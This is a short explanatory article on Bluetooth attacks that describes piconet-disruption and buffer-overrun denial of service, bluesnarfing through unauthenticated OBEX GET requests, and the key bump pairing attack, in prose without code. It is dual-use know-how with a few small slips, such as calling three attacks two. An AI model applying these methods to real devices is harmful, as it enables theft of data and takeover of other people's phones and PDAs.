Hacking Bluetooth

Bluetooth Attacks
Recently more Bluetooth attacks have emerged with Bluetooth technology gaining popularity. The two most well known attacks are DoS, bluesnarfing, and a key bump attack. The key bump attack involves obtaining the pairing key and then having full access to the victim's system. One Bluetooth DoS attack involves a device that is not part of a piconet disrupting the established piconet of other devices. A Bluetooth piconet is the ad hoc network created with two or more Bluetooth devices that includes one master device and a number of slaves.

The attacking device that is not participating in the piconet spoofs a slave out of the piconet and then contacts the master of the piconet. This will confuse the master device and lead to a disruption of the piconet. Another DoS attack on Bluetooth devices involves a buffer overrun. This is when data is copied into a buffer, but the amount of data copied into the buffer exceeds the size of the buffer. This will cause the data to be copied into memory where it is not intended. The resulting status of the system depends on where in memory the data is copied.

Bluesnarfing is a term that means an attacker has obtained unauthorized information through a Bluetooth connection. The Object Exchange (OBEX) Push Profiler (OPP) has been identified as an easy mechanism for exchange of business cards, calendar entries, and other similar items. In most cases it does not require authentication. Bluesnarfing involves connecting to the OBEX Push target and issuing an OBEX GET request for common known filenames. In some cases, depending on the victim device's firmware, the attacker will be able to obtain all the files that were requested.

In the key bump attack the attacker gets the victim to accept a connection for some trivial data transfer, such as a picture, calendar notice, or a business card on a PDA. After the data is sent, the attacker keeps the connection open. This allows the attacker to request a key regeneration after the victim has deleted the pairing between the two devices. Once the key regeneration is done, the attacker has full access to any services provided by the victim's device.